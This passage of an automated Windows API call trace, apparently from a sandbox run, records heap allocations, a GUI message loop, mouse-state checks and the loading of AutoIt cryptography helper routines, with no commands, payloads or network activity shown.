lpMem=0xef1790 | out: hHeap=0xc60000) returned 1 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1790 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17a0 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca818 [0264.570] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17b0 [0264.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1790 | out: hHeap=0xc60000) returned 1 [0264.572] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1780 | out: hHeap=0xc60000) returned 1 [0264.573] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1c60 [0264.573] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.573] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.573] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f854) returned 1 [0264.801] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.801] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.801] TranslateMessage (lpMsg=0x91f854) returned 0 [0264.801] DispatchMessageW (lpMsg=0x91f854) returned 0x0 [0264.801] GetForegroundWindow () returned 0x80170 [0264.801] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.801] GetCursorPos (in: lpPoint=0x91f690 | out: lpPoint=0x91f690*(x=890, y=510)) returned 1 [0264.801] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f690 | out: lpPoint=0x91f690) returned 1 [0264.801] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe90648 [0264.801] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83580 [0264.801] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1780 [0264.801] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1790 [0264.801] GetAsyncKeyState (vKey=1) returned 0 [0264.801] GetAsyncKeyState (vKey=2) returned 0 [0264.801] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.801] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.801] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f854) returned 1 [0264.802] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.802] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.802] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f854) returned 0 [0264.802] TranslateMessage (lpMsg=0x91f854) returned 0 [0264.802] DispatchMessageW (lpMsg=0x91f854) returned 0x0 [0264.802] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17a0 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.802] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0264.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5c0 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef17a0 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5e8 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81030 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17b0 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17c0 [0264.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83568 [0264.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb610 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835b0 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17b0 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835b0 | out: hHeap=0xc60000) returned 1 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb638 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835b0 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.803] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17c0 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81060 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835e0 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17c0 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1760 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1760 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835e0 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.803] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835b0 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb638 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17b0 | out: hHeap=0xc60000) returned 1 [0264.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb610 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83568 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5c0 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81030 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5e8 | out: hHeap=0xc60000) returned 1 [0264.804] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1c60 | out: hHeap=0xc60000) returned 1 [0264.804] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1c20 | out: hHeap=0xc60000) returned 1 [0264.804] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17a0 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81030 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.804] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17a0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17a0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17a0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83730 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83718 | out: hHeap=0xc60000) returned 1 [0264.804] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.804] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81030 | out: hHeap=0xc60000) returned 1 [0264.804] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c838 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb520 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb570 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811e0 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4f8 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1840 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4d0 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83508 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83520 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fd0 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834d8 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834f0 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1750 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83688 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81180 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb598 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81420 | out: hHeap=0xc60000) returned 1 [0264.805] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.805] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1c20 [0264.805] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.805] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1800 [0264.805] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1750 [0264.805] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1750 | out: hHeap=0xc60000) returned 1 [0264.805] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1c60 [0264.806] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1800 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1750 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.806] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0264.806] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.806] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1750 | out: hHeap=0xc60000) returned 1 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb598 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1750 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4d0 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81420 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1840 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81180 [0264.806] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1840 | out: hHeap=0xc60000) returned 1 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1840 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83688 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1830 [0264.806] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe834f0 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4f8 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.806] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1830 [0264.806] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834d8 | out: hHeap=0xc60000) returned 1 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb570 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe834d8 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80fd0 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb520 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83520 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83508 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17a0 [0264.807] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17a0 | out: hHeap=0xc60000) returned 1 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5e8 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.807] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17a0 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81000 | out: hHeap=0xc60000) returned 1 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5c0 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81000 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c838 [0264.808] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb610 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811e0 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17b0 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81030 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17c0 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81030 | out: hHeap=0xc60000) returned 1 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb638 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81030 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17c0 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83718 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83730 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1760 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83730 | out: hHeap=0xc60000) returned 1 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1760 | out: hHeap=0xc60000) returned 1 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb660 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83730 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1760 [0264.808] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83730 | out: hHeap=0xc60000) returned 1 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb688 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83730 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83568 [0264.808] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83568 | out: hHeap=0xc60000) returned 1 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb6b0 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83568 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835b0 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1770 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xc60000) returned 1 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb6d8 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1770 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83598 | out: hHeap=0xc60000) returned 1 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb700 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83598 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835e0 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1730 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835e0 | out: hHeap=0xc60000) returned 1 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1730 | out: hHeap=0xc60000) returned 1 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb728 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835e0 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1730 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81090 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.809] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1720 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.809] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.809] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1720 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.810] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.810] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe835c8 [0264.810] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.810] PeekMessageW (in: lpMsg=0x91f324, hWnd=0x0, wMsgFilterMin=0x0, 